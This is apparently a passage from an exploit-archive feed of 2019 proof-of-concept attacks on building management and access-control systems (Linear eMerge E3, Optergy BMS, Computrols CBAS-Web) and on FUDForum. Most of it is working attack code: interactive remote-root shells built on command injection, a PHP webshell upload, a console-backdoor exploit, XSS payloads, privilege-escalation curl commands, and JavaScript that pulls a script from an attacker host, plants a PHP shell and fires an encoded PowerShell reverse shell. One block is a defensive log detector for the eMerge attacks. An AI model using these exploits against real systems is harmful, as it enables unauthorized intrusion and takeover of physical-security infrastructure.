print readreq.text
if cmd.strip() == 'exit':
print "[+] Erasing read stage file and exiting..."
requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
print "[+] Done. Ba-bye!\n"
break
else: continue
except Exception:
break

sys.exit()


Linear eMerge E3 1.00-06 card_scan_decoder.php Command Injection

$
0
0

Linear eMerge E3 versions 1.00-06 and below unauthenticated command injection remote root exploit that leverages card_scan_decoder.php.


MD5 | 44a9793e2a7284d735e5ee358d786e4b

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan_decoder.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
#########################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
# Do you want me to try and get the web front-end credentials? (y/n) y
# ID='admin',Password='MakeLoveNotWar!'
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
# Software Version: 1.00.03
# Image: nxgcpub-image
# Built by: jenkins
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
#########################################################################

import requests
import time####
import sys#####
import os######
import re######

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print '''
.....
.e$$$$$$$$$$$$$$e.
z$$ ^$$$$$$$$$$$$$$$$$.
.$$$* J$$$$$$$$$$$$$$$$$$$e
.$" .$$$$$$$$$$$$$$$$$$$$$$*-
.$ $$$$$$$$$$$$$$$$***$$ .ee"
z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*"
" -\e$$ 4$$$$. .ze$$$""""
4 z$$$$$ $$$$$$$$$$$$$$$$$$$$"
$$$$$$$$ .$$$$$$$$$$$**$$$$*"
z$$" $$ $$$$P*"" J$*$$c
$$" $$F .$$$ $$ ^$$
$$ *$$c.z$$$ $$ $$
$P $$$$$$$ 4$F 4$
dP *$$$" $$ '$r
.$ J$" $"
$ $P 4$
F $$ 4$
4$% 4$
$$ 4$
d$" $$
$P $$
$$ $$
4$% $$
$$ $$
d$ $$
$F "3
r=4e=" ... ..rf . ""%
$**$*"^""=..^4*=4=^"" ^"""
'''
print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
print '\x20\x20[-] by lqwrm (c) 2019'
print '\n\x20\x20[*] Usage: '+piton+'<ipaddress:port>\n'
sys.exit()

ipaddr = sys.argv[1]

creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
if creds.strip() == 'y':
frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+'> test.txt%60')
showme = requests.get('http://'+ipaddr+'/test.txt')
print showme.text

while True:
try:
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+'> test.txt%60')
#time.sleep(1);
readreq = requests.get('http://'+ipaddr+'/test.txt')
print readreq.text
if cmd.strip() == 'exit':
print "[+] Erasing read stage file and exiting..."
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
print "[+] Done. Ba-bye!\n"
break
else: continue
except Exception:
break

sys.exit()

Linear eMerge E3 1.00-06 Arbitrary File Upload Remote Root Code Execution

$
0
0

Linear eMerge E3 versions 1.00-06 and below arbitrary file upload remote root code execution exploit.


MD5 | 7cb54d49b3539c9a3b2258832481a863

#!/usr/bin/env python
#
# Linear eMerge E3 Arbitrary File Upload Remote Root Code Execution
# Affected version: <=1.00-06
# CVE: CVE-2019-7257
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
#####################################################################
#
# lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2
# Starting exploit at 17.01.2019 13:04:17
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ echo davestyle | su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ exit
#
# [+] Deleting webshell.php file...
# [+] Done!
#
#####################################################################

import datetime
import requests
import sys
import os

piton = os.path.basename(sys.argv[0])

badge = "/badging/badge_layout_new_v0.php"
shell = "/badging/bg/webshell.php"

if len(sys.argv) < 2:
    print "\n\x20\x20[*] Usage: "+piton+" <ipaddress:port>\n"
    sys.exit()

ipaddr = sys.argv[1]
vremetodeneska = datetime.datetime.now()

print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S")
print

while True:
    try:
        target = "http://"+ipaddr+badge

        headers = {"User-Agent": "Brozilla/16.0",
                   "Accept": "anything",
                   "Accept-Language": "mk-MK,mk;q=0.7",
                   "Accept-Encoding": "gzip, deflate",
                   "Content-Type": "multipart/form-data; boundary=----j",
                   "Connection": "close"}

        # multipart body for the badge layout form; the "bg" file part is
        # written to /badging/bg/ under the name given in layout_name
        payload = ("------j\r\nContent-Disposition: form-da"
                   "ta; name=\"layout_name\"\r\n\r\nwebshel"
                   "l.php\r\n------j\r\nContent-Disposition"
                   ": form-data; name=\"bg\"; filename=\"we"
                   "bshell.php\"\r\nContent-Type: applicati"
                   "on/octet-stream\r\n\r\n<?\nif($_GET['cm"
                   "d']) {\n system($_GET['cmd']);\n }\n?"
                   ">\n\r\n------j--\r\n")

        requests.post(target, headers=headers, data=payload)

        cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ")
        execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd)
        print execute.text
        if cmd.strip() == "exit":
            print "[+] Deleting webshell.php file..."
            requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php")
            print "[+] Done!\n"
            break
        else: continue
    except Exception:
        print "Error!"
        break

sys.exit()

Linear eMerge E3 1.00-06 card_scan.php Command Injection


Linear eMerge E3 versions 1.00-06 and below unauthenticated command injection remote root exploit that leverages card_scan.php.


MD5 | 6bc7028052702f5b76c1733414371eb8

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# By Gjoko 'LiquidWorm' Krstic
#
###################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
###################################################################

import requests
import sys, os

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
    sys.exit()

ipaddr = sys.argv[1]

print
while True:
    try:
        cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
        # command output is redirected to test.txt in the web root and read back
        execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+'> test.txt%60')
        readreq = requests.get('http://'+ipaddr+'/test.txt')
        print readreq.text
        if cmd.strip() == 'exit':
            print "[+] Erasing read stage file and exiting..."
            requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
            print "[+] Done. Ba-bye!\n"
            break
        else: continue
    except Exception:
        break

sys.exit()

Linear eMerge E3 1.00-06 card_scan_decoder.php Command Injection


Linear eMerge E3 versions 1.00-06 and below unauthenticated command injection remote root exploit that leverages card_scan_decoder.php.


MD5 | 44a9793e2a7284d735e5ee358d786e4b

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan_decoder.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
#########################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
# Do you want me to try and get the web front-end credentials? (y/n) y
# ID='admin',Password='MakeLoveNotWar!'
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
# Software Version: 1.00.03
# Image: nxgcpub-image
# Built by: jenkins
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
#########################################################################

import requests
import time
import sys
import os
import re

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print '''
.....
.e$$$$$$$$$$$$$$e.
z$$ ^$$$$$$$$$$$$$$$$$.
.$$$* J$$$$$$$$$$$$$$$$$$$e
.$" .$$$$$$$$$$$$$$$$$$$$$$*-
.$ $$$$$$$$$$$$$$$$***$$ .ee"
z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*"
" -\e$$ 4$$$$. .ze$$$""""
4 z$$$$$ $$$$$$$$$$$$$$$$$$$$"
$$$$$$$$ .$$$$$$$$$$$**$$$$*"
z$$" $$ $$$$P*"" J$*$$c
$$" $$F .$$$ $$ ^$$
$$ *$$c.z$$$ $$ $$
$P $$$$$$$ 4$F 4$
dP *$$$" $$ '$r
.$ J$" $"
$ $P 4$
F $$ 4$
4$% 4$
$$ 4$
d$" $$
$P $$
$$ $$
4$% $$
$$ $$
d$ $$
$F "3
r=4e=" ... ..rf . ""%
$**$*"^""=..^4*=4=^"" ^"""
'''
    print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
    print '\x20\x20[-] by lqwrm (c) 2019'
    print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
    sys.exit()

ipaddr = sys.argv[1]

creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
if creds.strip() == 'y':
    frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
    requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+'> test.txt%60')
    showme = requests.get('http://'+ipaddr+'/test.txt')
    print showme.text

while True:
    try:
        cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
        # command output is redirected to test.txt in the web root and read back
        execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+'> test.txt%60')
        #time.sleep(1);
        readreq = requests.get('http://'+ipaddr+'/test.txt')
        print readreq.text
        if cmd.strip() == 'exit':
            print "[+] Erasing read stage file and exiting..."
            requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
            print "[+] Done. Ba-bye!\n"
            break
        else: continue
    except Exception:
        break

sys.exit()
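The three eMerge E3 PoCs above share a small set of observable traits: shell metacharacters in the numeric No/ReaderNo/door parameters of card_scan.php and card_scan_decoder.php, a read of the staged test.txt right afterwards, and a .php file served from the badge image directory. The following is an added detection example, not code from the advisory or from the PoCs; the combined access-log format, the sample lines and the IP addresses are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints and the parameters the PoCs above inject into.
INJECTION_ENDPOINTS = {
    "/card_scan.php": ("No", "ReaderNo"),
    "/card_scan_decoder.php": ("No", "ReaderNo", "door"),
}
# Directory the badge-layout upload writes into; it should only hold images.
BADGE_IMAGE_DIR = "/badging/bg/"
# File the PoCs use to stage command output for retrieval.
STAGING_FILE = "/test.txt"

# Backticks, $(...), pipes, separators and redirects have no place in a
# reader or door number.
SHELL_META = re.compile(r"[`;|&<>]|\$\(")

# Combined/common access-log format (assumed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def analyse_request(target):
    """Stateless checks on one request target; returns a list of findings."""
    findings = []
    parts = urlsplit(target)
    path = parts.path
    if path in INJECTION_ENDPOINTS:
        # parse_qs percent-decodes, so %60 shows up as a literal backtick.
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in INJECTION_ENDPOINTS[path]:
            if any(SHELL_META.search(v) for v in params.get(name, [])):
                findings.append("shell metacharacters in %s?%s" % (path, name))
    if path.startswith(BADGE_IMAGE_DIR) and path.lower().endswith(".php"):
        findings.append("PHP script requested from badge image dir %s" % path)
    return findings


def scan_log(lines):
    """Run the checks over access-log lines; correlate the staged-output read
    with a source that already tripped an injection rule."""
    alerts = []
    suspects = set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group("ip"), m.group("target")
        findings = analyse_request(target)
        if findings:
            suspects.add(ip)
        if urlsplit(target).path == STAGING_FILE and ip in suspects:
            findings.append("read of staged command output %s" % STAGING_FILE)
        for f in findings:
            alerts.append((ip, target, f))
    return alerts


# Constructed sample log: one benign reader poll, the two injection PoCs
# (as the HTTP client percent-encodes them), the staged read, a webshell
# call and a legitimate badge image fetch.
SAMPLE_LOG = [
    '192.168.1.50 - - [17/Jan/2019:13:04:17 +0100] "GET /card_scan.php?No=30&ReaderNo=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [17/Jan/2019:13:04:21 +0100] "GET /card_scan.php?No=30&ReaderNo=%60id%3E%20test.txt%60 HTTP/1.1" 200 38',
    '203.0.113.7 - - [17/Jan/2019:13:04:22 +0100] "GET /test.txt HTTP/1.1" 200 38',
    '203.0.113.7 - - [17/Jan/2019:13:05:02 +0100] "GET /card_scan_decoder.php?No=30&door=%60cat%20/etc/version%3E%20test.txt%60 HTTP/1.1" 200 38',
    '203.0.113.7 - - [17/Jan/2019:13:06:10 +0100] "GET /badging/bg/webshell.php?cmd=id HTTP/1.1" 200 41',
    '192.168.1.50 - - [17/Jan/2019:13:07:00 +0100] "GET /badging/bg/logo.png HTTP/1.1" 200 9041',
]

if __name__ == "__main__":
    for ip, target, finding in scan_log(SAMPLE_LOG):
        print("%s %s -> %s" % (ip, finding, target))
```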

Computrols CBAS-Web 19.0.0 Cross Site Scripting


Computrols CBAS-Web versions 19.0.0 and below suffer from a reflected cross site scripting vulnerability.


MD5 | 98ed5bd8f8a9dd9b41007dd8458f785d


Computrols CBAS-Web Unauthenticated Reflected XSS

Affected versions: 19.0.0 and below
CVE: CVE-2019-10846
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

Discovered by Gjoko 'LiquidWorm' Krstic

--

POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1

username="><script>confirm(document.cookie)</script>&submit_button=Send+Me+a+New+Password+Via+Email

=======

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username="><marquee>htmlinjection</marquee>&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

=======

GET /cbas/index.php?m=auth&a=login&username="><marquee>my milkshake brings all the boys to the yard.</marquee>&password=damn_right HTTP/1.1

Optergy BMS 2.0.3a Remote Root


Optergy BMS versions 2.0.3a and below unauthenticated remote root exploit. Related CVE number: CVE-2019-7276.


MD5 | 828db05389246ed7db50064512079555

#!/usr/bin/env python
#
# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
#
# Affected version <=2.0.3a (Proton and Enterprise)
# Discovered by Gjoko 'LiquidWorm' Krstic
#
# CVE: CVE-2019-7276
# Advisory: https://applied-risk.com/resources/ar-2019-008
#
##############################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
# Challenge received: 1547540929287
# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
##############################################################################
#
#

import os
import sys
import json
import hashlib
import requests

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
    sys.exit()

while True:

    challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'

    try:
        req1 = requests.get(challenge_url)
        get_challenge = json.loads(req1.text)
        challenge = get_challenge['response']['message']
        print 'Challenge received: ' + challenge

        # answer = sha1(challenge) || md5(sha1(challenge)), both hex-encoded
        h1 = hashlib.sha1(challenge.encode()).hexdigest()
        print 'SHA1: '+h1
        h2 = hashlib.md5(h1.encode()).hexdigest()
        print 'MD5 from SHA1: '+h2
        print 'Answer: '+h1+h2

        zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
        zeCommand = raw_input('# ')
        if zeCommand.strip() == 'exit':
            sys.exit()
        zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',
                     'Accept' : '*/*',
                     'Accept-Encoding' : 'gzip, deflate',
                     'Accept-Language' : 'mk-MK,mk;q=1.7',
                     'Connection' : 'keep-alive',
                     'Connection-Type' : 'application/x-www-form-urlencoded'}
        zePardata = {'command' : 'sudo '+zeCommand,
                     'challenge' : challenge,
                     'answer' : h1+h2}

        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
        get_resp = json.loads(zeRequest.text)
        get_answ = get_resp['response']['message']
        print get_answ
    except Exception:
        print '[*] Error!'
        break

Optergy BMS 2.0.3a Account Reset / Username Disclosure


Optergy BMS versions 2.0.3a and below account reset and username disclosure exploit.


MD5 | a1f66a4c127348cbe47ec39981351c17


Optergy BMS Account Reset and Username Disclosure

Affected version <=2.0.3a (Proton and Enterprise)
Discovered by Gjoko 'LiquidWorm' Krstic

CVE: CVE-2019-7272
Advisory: https://applied-risk.com/resources/ar-2019-008

PoC:

curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
<option value="80">djuro</option>
<option value="99">teppi</option>
<option value="67">view</option>
<option value="3">alerton</option>
<option value="59">stef</option>
<option value="41">humba</option>
<option value="25">drmio</option>
<option value="11">de3</option>
<option value="56">andri</option>
<option value="6">myko</option>
<option value="22">dzonka</option>
<option value="76">kosto</option>
<option value="8">beebee</option>
<option value="1">Administrator</option>


Linear eMerge E3 1.00-06 Privilege Escalation


Linear eMerge E3 versions 1.00-06 and below suffer from a privilege escalation vulnerability.


MD5 | e87096213609cedfeb448ae0ae5459f5


Linear eMerge E3 Privilege Escalation
Affected version: <=1.00-06
CVE: CVE-2019-7258, CVE-2019-7259
Advisory: https://applied-risk.com/resources/ar-2019-005

by Gjoko 'LiquidWorm' Krstic


Escalate:

curl "http://192.168.1.2/?c=webuser&m=update" -X POST --data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1"


Disclose:
curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1"

FUDForum 3.0.9 Code Execution / Cross Site Scripting


FUDForum version 3.0.9 suffers from remote code execution and stored cross site scripting vulnerabilities.


MD5 | 85fcbef86c0f69e85d73a2d8f71402a2

// Exploit Title         : FUDForum 3.0.9 - Stored XSS / Remote Code Execution
// Date : 10/26/19
// Exploit Author : liquidsky (JMcPeters)
// Vulnerable Software : FUDForum 3.0.9
// Vendor Homepage : https://sourceforge.net/projects/fudforum/
// Version : 3.0.9
// Software Link : https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
// Tested On : Windows / mysql / apache
// Author Site : https://github.com/fuzzlove/FUDforum-XSS-RCE
// Demo : https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
// CVE : CVE-2019-18839, CVE-2019-18873
//
// Greetz : wetw0rk, Fr13ndz, offsec =)
//
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
// The areas impacted are the admin panel and the forum.
//
// XSS via username in Forum:
// 1. Register an account and log in to the forum.
// 2. Go to the user control panel. -> Account Settings -> change login
// 3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
//
// XSS via user-agent in Admin Panel:
// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
// 2. Send the XSS payload below (from an IP associated with an account) / host the script:
// 3. curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
//

function patience()
{
    // wait for the upload request to complete before calling the script
    var u = setTimeout(grabShell, 5000);
}

// This function is to call the reverse shell php script (liquidsky.php).
// currently using a powershell payload that will need to be modified.
function grabShell()
{
var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42
%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%4
3%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
    var xhr = new XMLHttpRequest();
    xhr.open("GET", url, true);
    xhr.send(null);
}

function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", '/fudforum/adm/admbrowse.php', true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");

    var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
    var fileName = "liquidsky.php";
    var url = "/fudforum/adm/admbrowse.php";
    var ctype = "application/x-php";
    var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
    var boundary = "-----------------------------9703186584101745941654835853";
    var fileSize = fileData.length;

    // hand-built multipart body for the admin file browser upload form
    var body = "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
    body += currentdir + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
    body += token + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
    body += "Content-Type: " + ctype + "\r\n\r\n";
    body += fileData + "\r\n\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
    body += "1" + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
    body += fileName + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
    body += "Upload File" + '\r\n';
    body += "--" + boundary + "--";

    xhr.send(body);
}

//Grab SQ token
var req = new XMLHttpRequest();

req.onreadystatechange = function()
{
    if (req.readyState == 4 && req.status == 200) {
        var htmlPage = req.responseXML; /* fetch html */
        var SQ = htmlPage.getElementsByTagName("input")[0];
        submitFormWithTokenJS(SQ.value);
    }
};

req.open("GET", "/fudforum/adm/admuser.php", true);
req.responseType = "document";
req.send();

patience();

Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name


